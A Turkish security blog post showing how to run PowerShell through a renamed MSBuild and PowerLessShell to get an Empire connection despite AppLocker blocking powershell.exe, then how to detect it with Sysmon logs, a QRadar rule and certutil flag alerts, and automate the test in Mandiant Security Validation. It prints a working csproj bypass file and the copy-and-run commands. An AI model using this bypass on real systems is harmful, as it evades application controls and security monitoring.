<!DOCTYPE html>
<html lang="en" data-theme="light"><head>
    <title> Can Yoleri | Living A Sweet PowerShell: #2 </title>
    <meta charset="utf-8"><meta name="generator" content="Hugo 0.72.0" /><meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
    <meta name="description" content="Security Addict">
    
    <link rel="stylesheet" href="https://canyoleri.github.io/css/style.min.67cd718c0a3c8009c771494d381fb7128246a454bd0518fed97cb65d257db948.css" integrity="sha256-Z81xjAo8gAnHcUlNOB&#43;3EoJGpFS9BRj&#43;2Xy2XSV9uUg=" crossorigin="anonymous" type="text/css">
    
    <link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
    
    <link rel="shortcut icon" href="https://canyoleri.github.io/favicons/favicon.ico" type="image/x-icon">
    <link rel="apple-touch-icon" sizes="180x180" href="https://canyoleri.github.io/favicons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://canyoleri.github.io/favicons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://canyoleri.github.io/favicons/favicon-16x16.png">
    <link rel="canonical" href="https://canyoleri.github.io/post/livingsweetpwsh2/">
    
    
    <script type="text/javascript" src="https://canyoleri.github.io/js/anatole-header.min.c275265a259296f3dd50e8236a77fcbcadb1dbb9597d3045c675dcc2c7c58a93.js" integrity="sha256-wnUmWiWSlvPdUOgjanf8vK2x27lZfTBFxnXcwsfFipM=" crossorigin="anonymous"></script>
</head><body><div class="sidebar animated fadeInDown">
    <div class="logo-title">
      <div class="title">
        <img src="https://canyoleri.github.io/images/profile.jpg" alt="profile picture">
        <h3 title=""><a href="/">Can Yoleri</a></h3>
        <div class="description">
          <p>Security Addict</p>
        </div>
      </div>
    </div>
    <ul class="social-links">
        
        <li>
        <a href="https://www.linkedin.com/in/can-yoleri/" rel="me" aria-label="Linkedin">
          <i class="fa fa-2x fa-linkedin" aria-hidden="true"></i>
        </a>          
        </li>

        
        <li>
        <a href="https://github.com/canyoleri" rel="me" aria-label="GitHub">
          <i class="fa fa-2x fa-github" aria-hidden="true"></i>
        </a>          
        </li>

        
        <li>
        <a href="https://Twitter.com/CanYoleri" rel="me" aria-label="Twitter">
          <i class="fa fa-2x fa-twitter" aria-hidden="true"></i>
        </a>          
        </li>

        
    </ul>
    <div class="footer">
        <div class="by_farbox">&copy; Can Yoleri 2020 </div>
      </div>
    </div>
</div><div class="main">
            <div class="page-top animated fadeInDown">
    <ul class="nav">
        
        
        
        <li><a  href="/" title="">Home</a></li>
        
        
        <li><a  href="/post/" title="">Posts</a></li>
        
        
        <li><a  href="/about/" title="">About</a></li>
        
    </ul>
    <div class="themeswitcher">
        <a class="theme-switch" title="Switch Theme">
            <i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
        </a>
    </div>
</div>

            <div class="autopagerize_page_element">
                <div class="content">
<div class="post animated fadeInDown">
    <div class="post-content">

      <div class="post-title">
        <h3>Living A Sweet PowerShell: #2
        </h3>
        
        <div class="info">
          <i class="fa fa-sun-o"></i><span class="date">Sun, Sep 20, 2020</span>
          <i class="fa fa-clock-o"></i><span class="reading-time">6-minute read</span>
        </div>
        
        </div>

    <p align="center">
  <img src="/images/pwsholmadan/blue-red.jpg" width="650" height="400"/>
</p>
<p>Bazı domain ortamlarında güvenlik veya sıkılaştırmalardan dolayı <strong>powershell.exe</strong> - <strong>powershell_ise.exe</strong> processlerinin çalışması GPO/Applocker üzerinden engellenebiliyor. Bu kısıtlamalar bazen yanlış da yapılandırılabiliyor.. Direkt olarak PowerShell komutlarımızı, scriptlerimizi çalıştıramıyoruz, sızma testlerinde Offensive PowerShell büyük bir nimetken bir kaç kısıtlama var diye pes edecek değiliz :) PowerShell, powershell.exe&rsquo;den ibaret olmadığı için bu kısıtlamaları aşabiliyoruz.</p>
<p>Bugünkü senaryoda Red Team tarafında powershell.exe&rsquo;nin engelli olduğu bir ortamda Empire üzerinden bağlantı almayı, PowerShell scripti, komutu çalıştırmayı, Blue Team tarafında bu saldırıları nasıl tespit edebileceğimizi, kurallar geliştireceğimizi ve kendi oluşturduğumuz atak senaryolarını Mandiant Security Validation (Verodin) ürünü üzerinden otomatize hale getirerek güvenlik ürünlerinin tepkilerini, SIEM kurallarını test edeceğiz.</p>
<p><strong>Ortamda neler var?</strong></p>
<ul>
<li>Sysmon</li>
<li>QRadar</li>
<li>PowerShell loglarının konfigüre edilmiş olması (Module Logging vs..)</li>
<li>Verodin</li>
</ul>
<p><br />
Applocker ile powershell.exe - powershell_ise.exe processlerini engelledim.</p>
<img src="/images/pwsholmadan/applockerpwsh.png" style="width:800px;"/>
<p>Applocker ile hızımı alamadım ek olarak Don&rsquo;t run specified Windows applications seçeneğiyle engelledim.</p>
<img src="/images/pwsholmadan/pwshblock.png" style="width:800px;"/>
<p><br /></p>
<p><strong>Saldırgan tarafı:</strong></p>
<p>Empire&rsquo;ı ayarlayıp Listener başlattım</p>
<img src="/images/pwsholmadan/listener.png" style="width:800px;"/>
<p>Launcher kodumuz aşağıdaki gibi.</p>
<img src="/images/pwsholmadan/launcher.png" style="width:800px;"/>
<p>MSBuild üzerinden PowerShell scripti, kodu çalıştırmak için PowerLessShell aracını kullanmam gerekiyor. PowerLessShell, MSBuild üzerinden powershell.exe kullanmadan PowerShell scriptlerinizi, kodunuzu çalıştırmaya imkan veren bir araçtır.</p>
<p><a href="https://github.com/Mr-Un1k0d3r/PowerLessShell">PowerLessShell</a></p>
<p><br />
Base64 ile şifrelenen launcher kodunu çözüp pw.ps1 dosyası olarak kaydettim.</p>
<img src="/images/pwsholmadan/base64.png" style="width:800px;"/>
<p>PowerLessShell&rsquo;i çalıştırıp gerekli değerleri girip csproj ve csproj.bat dosyası oluşturdum.</p>
<img src="/images/pwsholmadan/powerlesshell.png" style="width:800px;"/>
<p>Oluşturduğu csproj dosyası:</p>
<img src="/images/pwsholmadan/sky.png" style="width:800px;"/>
<img src="/images/pwsholmadan/sky2.png" style="width:800px;"/>
<img src="/images/pwsholmadan/sky3.png" style="width:800px;"/>
<p>Oluşturduğu csproj.bat dosyası:</p>
<img src="/images/pwsholmadan/csproj-bat.png" style="width:800px;"/>
<img src="/images/pwsholmadan/csproj-bat2.png" style="width:800px;"/>
<p><br />
Saldırgan olarak şu anda tek yapmam gereken hedef sistem üzerinde sky.csproj.bat dosyasını çalıştırmak.</p>
<img src="/images/pwsholmadan/runpayload.png" style="width:800px;"/>
<p><strong>Build started</strong>.</p>
<p>Empire&rsquo;a baktığımda bağlantının gelmiş olduğunu görüyorum.</p>
<img src="/images/pwsholmadan/runpayload2.png" style="width:800px;"/>
<img src="/images/pwsholmadan/runpayload3.png" style="width:800px;"/>
<p>bat dosyasını çalıştırdığımızda msbuild.exe&rsquo;yi kopyalayarak adını değiştiriyor, hedef sistemin SIEM&rsquo;inde imagename == msbuild.exe ile ilgili bir kural/kurallar varsa bypass edilmiş oluyor, alarm oluşmuyor.  Windows&rsquo;un legal processlerini (certutil) kullanarak AV/EDR gibi ürünleri de atlatabiliyor.</p>
<p><br />
<strong>Savunma tarafı:</strong></p>
<p>Yukarıdaki bat dosyası çalıştırdığımızda gelen logları incelemeye başlayalım.</p>
<p>cmd.exe, certutil processine 0x1fffff izniyle erişiyor. Anormal bir durum olabileceği için loglara bakmaya devam edelim.</p>
<img src="/images/pwsholmadan/log2.png" style="width:800px;"/>
<p><br />
<strong>Microsoft.Net\Framework*</strong>  dizini altında ZRdFAwXBUI.exe diye bir dosya oluşmuş. Fakat bu Windows&rsquo;a ait bir process değil ve adının böyle olması anormal bir durum hakkında olan şüphelerimizi yavaş yavaş doğru çıkarıyor..</p>
<img src="/images/pwsholmadan/log3.png" style="width:800px;"/>
<p><br />
Loglara bakmaya devam ediyorum. Az önce gördüğüm process temp alanında bir dll dosyası oluşturmuş.</p>
<img src="/images/pwsholmadan/log4.png" style="width:800px;"/>
<p><br /></p>
<img src="/images/pwsholmadan/log5.png" style="width:800px;"/>
<p><br />
Bu process System.Management.Automation.dll dosyasını da yüklemiş. PowerShell, System.Management.Automation.dll&rsquo;in içerisinde işlem yapar. Bu DLL dosyasını görünce bu processin PowerShell kullanmaya çalıştığını düşünüyoruz.</p>
<img src="/images/pwsholmadan/log6.png" style="width:800px;"/>
<p><br />
Yukarıda bahsettiğim üzere PowerLessShell, MSBuild processini kopyalayıp adını değiştiriyordu fakat Windows&rsquo;un kendi processleri çalıştığında üretilen Process Create logunun içerisine <strong>OriginalFileName</strong> diye bir alan eklenir. MSBuild processinin adı zedeleyici.exe bile olsa OriginalFileName kısmında MSBuild.exe diye processin gerçek adını görürüz.</p>
<p>Aşağıdaki Process Create loguna baktığım zaman OriginalFileName MSBuild.exe olmasına rağmen Image kısmında ZRdFAwXBUI.exe olarak görüyorum.</p>
<img src="/images/pwsholmadan/originalfilenamelogs.png" style="width:800px;"/>
<p><br /></p>
<img src="/images/pwsholmadan/log7.png" style="width:800px;"/>
<p><br />
O zaman QRadar üzerinde ImageName ve OriginalFileName adları aynı olmayan process create logları için bir kural yazıp alarm oluşturabilirim. Aşağıdaki gibi bir AQL yazdığımda bana istediğim şeyi veriyor. Bunu kural olarak ekleyip yoluma devam ediyorum.</p>
<blockquote>
<ul>
<li>False Positive elemesi yapmak gerekebiliyor :)</li>
</ul>
</blockquote>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#66d9ef">SELECT</span> ImageName, OriginalFileName <span style="color:#66d9ef">FROM</span> events
<span style="color:#66d9ef">WHERE</span> <span style="color:#e6db74">&#34;EventID&#34;</span><span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;1&#39;</span> <span style="color:#66d9ef">AND</span>
LOGSOURCENAME(logsourceid) <span style="color:#66d9ef">ILIKE</span> <span style="color:#e6db74">&#39;%ZEDELEYICI%&#39;</span>
<span style="color:#66d9ef">AND</span> <span style="color:#66d9ef">LOWER</span>(<span style="color:#e6db74">&#34;ImageName&#34;</span>)
<span style="color:#f92672">!=</span> <span style="color:#66d9ef">LOWER</span>(<span style="color:#e6db74">&#34;OriginalFileName&#34;</span>) <span style="color:#66d9ef">AND</span> <span style="color:#e6db74">&#34;ImageName&#34;</span> <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">AND</span> <span style="color:#e6db74">&#34;OriginalFileName&#34;</span> <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">AND</span> <span style="color:#e6db74">&#34;OriginalFileName&#34;</span> <span style="color:#f92672">&lt;&gt;</span> <span style="color:#e6db74">&#39;?&#39;</span>
</code></pre></div><img src="/images/pwsholmadan/qradar-aql.png" style="width:800px;"/>
<p><br />
Bir önceki blog yazımda PowerShell loglamasının açık olmasının öneminden bahsetmiştim. PowerShell loglaması açık olduğu için çalışan PowerShell scriptini aşağıdaki log içerisinde görüyorum.</p>
<blockquote>
<ul>
<li>FromBase64String yazan kısmı decode edince C&amp;C sunucusunun IP adresi ortaya çıkıyor.</li>
</ul>
</blockquote>
<img src="/images/pwsholmadan/log8.png" style="width:800px;"/>
<img src="/images/pwsholmadan/log11.png" style="width:800px;"/>
<p><strong>Host Application = ZRdFAwXBUI.exe</strong></p>
<img src="/images/pwsholmadan/log12.png" style="width:800px;"/>
<p>Aynı anormal process Windows&rsquo;un legal processi olan fakat kötüye kullanıma da imkan veren csc.exe processini kullanıyor
<img src="/images/pwsholmadan/log9.png" style="width:800px;"/></p>
<p>__PSScriptPolicyTest_&lt;random_number&gt;.ps1 dosyaları PowerShell tarafından Applocker&rsquo;ı test etmek için kullanılır. Eğer dosya çalışırsa Applocker&rsquo;ın kapalı olduğunu varsayar. Aslında PowerShell&rsquo;in normal bir davranışıdır fakat imagename kısmında gördügüm process adından sonra anormal geliyor..</p>
<img src="/images/pwsholmadan/log10.png" style="width:800px;"/>
<p><br />
certutil processinin -decodehex parametresiyle kullanıldığını görüyorum. Certutil de legal fakat kötüye kullanıma imkan veren bir process olduğu için aşağıdaki parametrelerle kullanıldığında alarm üretmesini sağlayıp incelemek gerekiyor.</p>
<p><strong>-decodehex</strong></p>
<p><strong>-urlcache -split</strong></p>
<p><strong>-encode</strong></p>
<p><strong>-decode</strong></p>
<img src="/images/pwsholmadan/decodehex.png" style="width:800px;"/>
<p><br />
Buraya kadar nasıl önlem alabileceğimizi az çok göstermeye çalıştım fakat bir diğer önemli konu bu saldırı senaryolarının otomatize hale getirilmesi. Bir yandan atak senaryomuzu deneyip bir yandan logları incelemeye çalışırken fazla zaman harcayabiliyoruz. Fireeye&rsquo;ın satın aldığı eski adıyla Verodin yeni adıyla  Mandiant Security Validation ürünü sayesinde yazdığımız atak senaryolarını otomatize hale getirebiliriz. SIEM, Network, Endpoint güvenlik ürünleriyle de entegre olarak senaryoların sonucunda üretilen alarmları, logları, engellenip engellenmediğini görebiliyoruz.</p>
<blockquote>
<ul>
<li>Üstte PowerLessShell ile oluşturduğum csproj dosyası ile Verodin&rsquo;e eklediğim csproj dosyası birbirinden farklı. Verodin&rsquo;le test ederken Empire&rsquo;a bağlantı almayacağım için PowerShell&rsquo;de komut çalıştırabileceğim bir csproj işimi görüyor.</li>
</ul>
</blockquote>
<p><br />
PowerShell kodu çalıştırabileceğim bir csproj dosyası hazırlarken internette daha önce <strong>powashell.csproj</strong> adıyla yazılan bir dosyaya denk geldim.
<a href="https://gist.githubusercontent.com/egre55/7a6b6018c9c5ae88c63bdb23879df4d0/raw/2a27c22e8d3436640e7f1ac5219095af3075b446/powashell.csproj">powashell.csproj</a></p>
<p>Scripte aşağıdaki gibi encode edilmiş bir powershell komutu ekledim.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-cs" data-lang="cs">&lt;Project ToolsVersion=<span style="color:#e6db74">&#34;4.0&#34;</span> xmlns=<span style="color:#e6db74">&#34;http://schemas.microsoft.com/developer/msbuild/2003&#34;</span>&gt;
  &lt;!-- This inline task executes c<span style="color:#960050;background-color:#1e0010">#</span> code. --&gt;
  &lt;!-- C:<span style="color:#960050;background-color:#1e0010">\</span>Windows<span style="color:#960050;background-color:#1e0010">\</span>Microsoft.NET<span style="color:#960050;background-color:#1e0010">\</span>Framework<span style="color:#960050;background-color:#1e0010">\</span>v4.<span style="color:#ae81ff">0.30319</span><span style="color:#960050;background-color:#1e0010">\</span>msbuild.exe powaShell.csproj --&gt;
  &lt;Target Name=<span style="color:#e6db74">&#34;Hello&#34;</span>&gt;
   &lt;ClassExample /&gt;
  &lt;/Target&gt;
  &lt;UsingTask
    TaskName=<span style="color:#e6db74">&#34;ClassExample&#34;</span>
    TaskFactory=<span style="color:#e6db74">&#34;CodeTaskFactory&#34;</span>
    AssemblyFile=<span style="color:#e6db74">&#34;C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll&#34;</span> &gt;
  &lt;Task&gt;
   &lt;Reference Include=<span style="color:#e6db74">&#34;C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll&#34;</span> /&gt;
   &lt;!-- Your PowerShell Path May vary --&gt;
      &lt;Code Type=<span style="color:#e6db74">&#34;Class&#34;</span> Language=<span style="color:#e6db74">&#34;cs&#34;</span>&gt;
        &lt;![CDATA[

      <span style="color:#75715e">// all code by Casey Smith @SubTee
</span><span style="color:#75715e"></span>
      <span style="color:#66d9ef">using</span> System;
      <span style="color:#66d9ef">using</span> System.Reflection;
      <span style="color:#66d9ef">using</span> Microsoft.Build.Framework;
      <span style="color:#66d9ef">using</span> Microsoft.Build.Utilities;
      
      <span style="color:#66d9ef">using</span> System.Collections.ObjectModel;
      <span style="color:#66d9ef">using</span> System.Management.Automation;
      <span style="color:#66d9ef">using</span> System.Management.Automation.Runspaces;
      <span style="color:#66d9ef">using</span> System.Text;
        
      <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">class</span> <span style="color:#a6e22e">ClassExample</span> :  Task, ITask
      {
        <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">override</span> <span style="color:#66d9ef">bool</span> Execute()
        {
          <span style="color:#75715e">//Console.WriteLine(&#34;Hello From a Class.&#34;);
</span><span style="color:#75715e"></span>          Console.WriteLine(powaShell.RunPSCommand());
          <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">true</span>;
        }
      }
      
      <span style="color:#75715e">//Based on Jared Atkinson&#39;s And Justin Warner&#39;s Work
</span><span style="color:#75715e"></span>      <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">class</span> <span style="color:#a6e22e">powaShell</span>
      {
        <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">string</span> RunPSCommand()
        {
                    
          <span style="color:#75715e">//Init stuff
</span><span style="color:#75715e"></span>          
          InitialSessionState iss = InitialSessionState.CreateDefault();
          iss.LanguageMode = PSLanguageMode.FullLanguage;
          Runspace runspace = RunspaceFactory.CreateRunspace(iss);
          runspace.Open();
          RunspaceInvoke scriptInvoker = <span style="color:#66d9ef">new</span> RunspaceInvoke(runspace);
          Pipeline pipeline = runspace.CreatePipeline();
          
          <span style="color:#75715e">//Interrogate LockDownPolicy
</span><span style="color:#75715e"></span>          Console.WriteLine(System.Management.Automation.Security.SystemPolicy.GetSystemLockdownPolicy());        
          
          
          
          <span style="color:#75715e">//Add commands
</span><span style="color:#75715e"></span>          pipeline.Commands.AddScript((<span style="color:#e6db74">&#34;powershell -enc dwBoAG8AYQBtAGkA -noexit&#34;</span>));
          <span style="color:#75715e">//Prep PS for string output and invoke
</span><span style="color:#75715e"></span>          pipeline.Commands.Add(<span style="color:#e6db74">&#34;Out-String&#34;</span>);
          Collection&lt;PSObject&gt; results = pipeline.Invoke();
          

          <span style="color:#75715e">//Convert records to strings
</span><span style="color:#75715e"></span>          StringBuilder stringBuilder = <span style="color:#66d9ef">new</span> StringBuilder();
          <span style="color:#66d9ef">foreach</span> (PSObject obj <span style="color:#66d9ef">in</span> results)
          {
            stringBuilder.Append(obj);
          }
          <span style="color:#66d9ef">return</span> stringBuilder.ToString().Trim();     
        }
      }
              
        ]]&gt;
      &lt;/Code&gt;
    &lt;/Task&gt;
  &lt;/UsingTask&gt;
&lt;/Project&gt;
</code></pre></div><p><br />
Şimdi Verodin&rsquo;e ekleyerek senaryoyu otomatize hale getirelim.</p>
<p>Verodin&rsquo;e girdiğimizde Library kısmında Files seçeneğine geliyoruz ve Upload File diyoruz.</p>
<img src="/images/pwsholmadan/verodinfiles.png" style="width:800px;"/>
<p>Böyle bir ekran geliyor karşımıza. File Notes, Applicable OS/platform kısımlarını doldurup csproj dosyasını seçiyorum ve upload file diyorum.</p>
<img src="/images/pwsholmadan/verodin-upload-file.png" style="width:800px;"/>
<p><br />
csproj dosyamızı ekledik. (ben daha önceden ekleyip actions oluşturduğum için VIDs kısmında action numaralarını görüyorum.)</p>
<img src="/images/pwsholmadan/verodin-up-success.png" style="width:800px;"/>
<p>Dosyamızı ekledikten sonra bir Actions oluşturmamız gerekiyor. Library &gt; Actions kısmına geliyorum. Add Action kısmından Host CLI oluşturacağım için onu seçiyorum.</p>
<img src="/images/pwsholmadan/verodin-actions.png" style="width:800px;"/>
<p><br /></p>
<p><strong>Action User Profile</strong> kısmında System kullanıcısıyla çalışacağını belirtiyorum.</p>
<p><strong>Add File Dependencies</strong> kısmından az önce eklediğim <strong>PWSH-without-pwsh.exe.csproj</strong> dosyasını seçip çalışacağı dizini belirttim.</p>
<img src="/images/pwsholmadan/verodin-actions2.png" style="width:800px;"/>
<p>Next diyorum.</p>
<p><br />
Bu kısımda cmd.exe üzerinden çalışacağını belirtiyorum. İstersek powershell, python, bash üzerinden de çalıştırabiliriz.</p>
<img src="/images/pwsholmadan/verodin-actions3.png" style="width:800px;"/>
<p>Command Input kısmında bu atak senaryosunun hangi parametrelerle çalışacağını ve ne yapacağını yazıyorum.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell"><span style="color:#75715e">#Sistemin x64 veya x86 olup olmadıgını kontrol ediyoruz  </span>
<span style="color:#66d9ef">for</span> /F <span style="color:#e6db74">&#34;delims==&#34;</span> <span style="color:#66d9ef">%</span>A <span style="color:#66d9ef">in</span> (<span style="color:#e6db74">&#39;systeminfo ^|findstr /B /C:&#34;System Type&#34;&#39;</span>) <span style="color:#66d9ef">do</span> @set Arch=<span style="color:#66d9ef">%</span>A
  auto,4,true,60
  success_zero

<span style="color:#75715e">#x64 ise bu path, x86 ise şu pathe git şeklinde belirtiyoruz.</span>
<span style="color:#66d9ef">if</span> /I <span style="color:#e6db74">&#34;%Arch:86=%&#34;</span> equ <span style="color:#e6db74">&#34;%Arch%&#34;</span> (set Part1=C:\Windows\Microsoft.NET\Framework64\) <span style="color:#66d9ef">ELSE</span> (set Part1=C:\Windows\Microsoft.NET\Framework\)
  auto,4,true,60
  success_zero

<span style="color:#75715e">#MSBuild.exe&#39;yi ms.exe adıyla tmp alanına kopyalıyorum</span>
copy <span style="color:#66d9ef">%</span>Part1<span style="color:#66d9ef">%</span>v4.0.30319\msbuild.exe <span style="color:#66d9ef">%</span>tmp%\ms.exe
  auto,4,true,60
  success_zero

<span style="color:#75715e">#cmd&#39;yi açıp ms.exe&#39;yi csproj dosyasıyla beraber çalıştırıyorum.</span>
start cmd.exe @cmd /k <span style="color:#e6db74">&#34;%tmp%\ms.exe c:\windows\temp\PWSH-without-pwsh.exe.csproj&#34;</span>
  auto,10,true,60
  success_zero

<span style="color:#75715e">#Eger atak başarılı bir şekilde gerçekleştiyse ms.exe processi çalışacaktır. </span>
tasklist /svc | findstr ms.exe
  auto,4,true,60
  success_zero

<span style="color:#75715e">#Atak başarılı bir şekilde gerçekleşiyor ve ms.exe processini öldürüyoruz.</span>
taskkill /im <span style="color:#e6db74">&#34;ms.exe&#34;</span> /f
  auto,4,true,60
  cleanup
  
<span style="color:#75715e">#csproj dosyasını siliyoruz.  </span>
del c:\windows\temp\PWSH-without-pwsh.exe.csproj
  auto,4,true,60
  cleanup

<span style="color:#75715e">#ms.exe processini siliyoruz.</span>
del <span style="color:#66d9ef">%</span>tmp%\ms.exe
  auto,4,true,60
  cleanup
</code></pre></div><p><br /></p>
<p>Validate Syntax butonuna basıp yazdıklarımızda bir sıkıntı varsa görebiliyoruz. <strong>Successful</strong></p>
<img src="/images/pwsholmadan/verodin-actions4.png" style="width:800px;"/>
<p>Next diyoruz.</p>
<p><br />
Action adını ve açıklamasını yazıyoruz.</p>
<p><strong>Attack vector</strong>          general-vector</p>
<p><strong>Attacker location</strong>      Internal</p>
<p><strong>Behavior Type</strong>          General Behavior</p>
<p><strong>Covert</strong>                 No</p>
<p><strong>OS/Platform</strong>            Windows</p>
<p><strong>Stage of Attack</strong>        Execution</p>
<p>User tag olarak <strong>#powerhell</strong> ve <strong>#msbuild</strong> yazdım.</p>
<img src="/images/pwsholmadan/verodin-actions5.png" style="width:800px;"/>
<p>Save and Approve Anywhere butonuna basıp kaydediyorum. Library &gt; Actions kısmına gelip arama kısmına <strong>Execution: PowerShell without powershell.exe</strong> yazınca oluşturduğum aksiyonu görebiliyorum.</p>
<img src="/images/pwsholmadan/verodin-actions6.png" style="width:800px;"/>
<img src="/images/pwsholmadan/verodin-actions7.png" style="width:800px;"/>
<p>Oluşturduğum aksiyonu çalıştırıp deneyeceğim. Mavi renkli play butonuna basıp Endpoint Actor seçeneğinden hangi aktörde bu senaryoyu yapmak istiyorsam onu seçip Run Now diyerek başlatıyorum.</p>
<img src="/images/pwsholmadan/verodin-run.png" style="width:800px;"/>
<p><strong>RUNNING</strong></p>
<img src="/images/pwsholmadan/verodin-actions-run.png" style="width:800px;"/>
<p>Denediğim senaryo üstteki yazdığım SIEM kurallarıma çarptığı için saldırıyı yakaladım fakat Not Blocked&hellip;</p>
<img src="/images/pwsholmadan/verodin-actions-run2.png" style="width:800px;"/>
<p>En güzel noktalardan bir tanesi aksiyonu oluştururken yazdığımız komutların çıktılarını bize aşağıdaki gibi verebiliyor. Gerçekten çalıştı mı yoksa hata mı aldı diye görebiliyoruz.</p>
<img src="/images/pwsholmadan/verodin-actions-run-3.png" style="width:800px;"/>
<p>Events kısmından incelediğimizde Match eden QRadar kurallarını rahatlıkla görebiliyoruz.</p>
<img src="/images/pwsholmadan/verodin-actions-qradar.png" style="width:800px;"/>
<p><br />
Yazıda yanlışlık gördüğünüz yerlerde benimle iletişime geçebilirsiniz. Bir sonraki yazı dizisinde görüşmek üzere. 
<br /></p>
    </div>
    <div class="post-footer">
      <div class="info">
        
        
      </div>
    </div>

    
           
    
</div>


                </div>
            </div>
        </div>
</body>



<script type="text/javascript" src="https://canyoleri.github.io/js/jquery.min.86b1e8f819ee2d9099a783e50b49dff24282545fc40773861f9126b921532e4c.js" integrity="sha256-hrHo&#43;BnuLZCZp4PlC0nf8kKCVF/EB3OGH5EmuSFTLkw=" crossorigin="anonymous"></script>




<script type="text/javascript" src="https://canyoleri.github.io/js/bundle.min.0f9c74cb78f13d1f15f33daff4037c70354f98acfbb97a6f61708966675c3cae.js" integrity="sha256-D5x0y3jxPR8V8z2v9AN8cDVPmKz7uXpvYXCJZmdcPK4=" crossorigin="anonymous"></script>

<script type="text/javascript" src="https://canyoleri.github.io/js/medium-zoom.min.92f21c856129f84aeb719459b3e6ac621a3032fd7b180a18c04e1d12083f8aba.js" integrity="sha256-kvIchWEp&#43;ErrcZRZs&#43;asYhowMv17GAoYwE4dEgg/iro=" crossorigin="anonymous"></script></html></body>

</html>
